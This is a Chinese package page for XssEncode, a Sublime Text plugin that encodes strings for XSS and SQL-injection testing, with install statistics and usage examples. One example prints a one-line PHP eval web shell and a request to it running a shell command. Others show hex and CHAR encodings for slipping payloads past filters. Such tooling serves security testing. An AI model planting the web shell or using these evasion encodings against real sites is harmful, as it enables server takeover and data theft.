XssEncode
使用转换将字符从一种编码转换为另一种编码。
详细信息
安装
- 总计 5K
- Win 4K
- Mac 630
- Linux 306
| 8月6日 | 8月5日 | 8月4日 | 8月3日 | 8月2日 | 8月1日 | 7月31日 | 7月30日 | 7月29日 | 7月28日 | 7月27日 | 7月26日 | 7月25日 | 7月24日 | 7月23日 | 7月22日 | 7月21日 | 7月20日 | 7月19日 | 7月18日 | 7月17日 | 7月16日 | 7月15日 | 7月14日 | 7月13日 | 7月12日 | 7月11日 | 7月10日 | 7月9日 | 7月8日 | 7月7日 | 7月6日 | 7月5日 | 7月4日 | 7月3日 | 7月2日 | 7月1日 | 6月30日 | 6月29日 | 6月28日 | 6月27日 | 6月26日 | 6月25日 | 6月24日 | 6月23日 | 6月22日 | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Windows | 9 | 3 | 1 | 1 | 2 | 7 | 3 | 3 | 3 | 0 | 2 | 1 | 1 | 3 | 5 | 4 | 8 | 4 | 2 | 2 | 1 | 4 | 5 | 2 | 1 | 7 | 3 | 4 | 1 | 2 | 1 | 1 | 4 | 4 | 3 | 2 | 3 | 0 | 1 | 5 | 3 | 3 | 7 | 3 | 2 | 0 |
| Mac | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
| Linux | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
README.md
Sublime XssEncode
使用转换将字符从一种编码转换为另一种编码。此工具可以帮助您在测试SQL注入、XSS漏洞和网站安全中编码有效负载。
转换所选区域或转换所有字符。
XssEncode 支持 Sublime Text 2 和 3。
安装
使用 Package Control 查找、安装和升级 XssEncode 是安装此插件的推荐方法。
否则,您可以按照以下步骤手动安装
打开 Sublime Text Packages 文件夹
- OS X: ~/Library/Application Support/Sublime Text 3/Packages/
- Windows: %APPDATA%/Sublime Text 3/Packages/
- Linux: ~/.Sublime Text 3/Packages/ 或 ~/.config/sublime-text-3/Packages
将该仓库克隆
git clone https://github.com/Medicean/SublimeXssEncode.git
将新文件夹重命名为 xssencode
变更日志
更多信息请参阅 变更日志
示例命令
您可以输入命令快捷键(Win:
ctrl+shift+p,OSX: Command+shift+p),输入xssencode并选择您的操作。否则,单击菜单栏的工具=>XssEncode并选择您的操作。
html_escape将字符转换为它们的HTML实体。
例如
a1@&=>a1@&html10_encode将字符转换为带有十进制数字的HTML实体。
例如
a1@&=>a1@&html16_encode将字符转换为带有十六进制数的HTML实体。
例如
a1@&=>a1@&html_unescape将HTML实体转换为字符。
例如
aaa&=>aaa&base64_encode使用base64进行编码。
例如
a1@&=>YTFAJg==base64_decode例如
YTFAJg====》a1@&url_encode例如
alert(/xss/);==》alert%28%2F%E5%85%B3%E7%A7%BB%2F%29%3Burl_decode例如
alert%28%2F%E5%85%B3%E7%A7%BB%2F%29%3B==》alert(/xss/);string_from_char_code例如
alert(/xss/);==》String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41,59)mysql_char例如
123==》CHAR(49,50,51)您可以执行以下SQL命令。
select 123;select CHAR(49,50,51);oracle_chr例如
123==》CHR(49)||CHR(50)||CHR(51)您可以执行以下SQL命令。
select 123;select CHR(49)||CHR(50)||CHR(51);php_chr使用chr函数转换字符。
例如
我们支持一个PHP后门,内容为
<?php @eval($_REQUEST[cmd]);?>如果您想执行包含特殊字符的命令,可以将其转换。
ls -al==》CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108)现在您可以请求以下URL
http://127.0.0.1/backdoor.php?cmd=system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108));string_to_hex将字符串转换为十六进制,对于SQL注入很有用。
例如
root==》726f6f74现在您可以执行以下SQL命令。
SELECT user from mysql.user where user='root';SELECT user from mysql.user where user=0x726f6f74;hex_to_string例如
726f6f74==》rootunicode_decode例如
测试==》\u6d4b\u8bd5unicode_encode例如
\u6d4b\u8bd5==》测试md5_encode例如
1==》c4ca4238a0b923820dcc509a6f75849b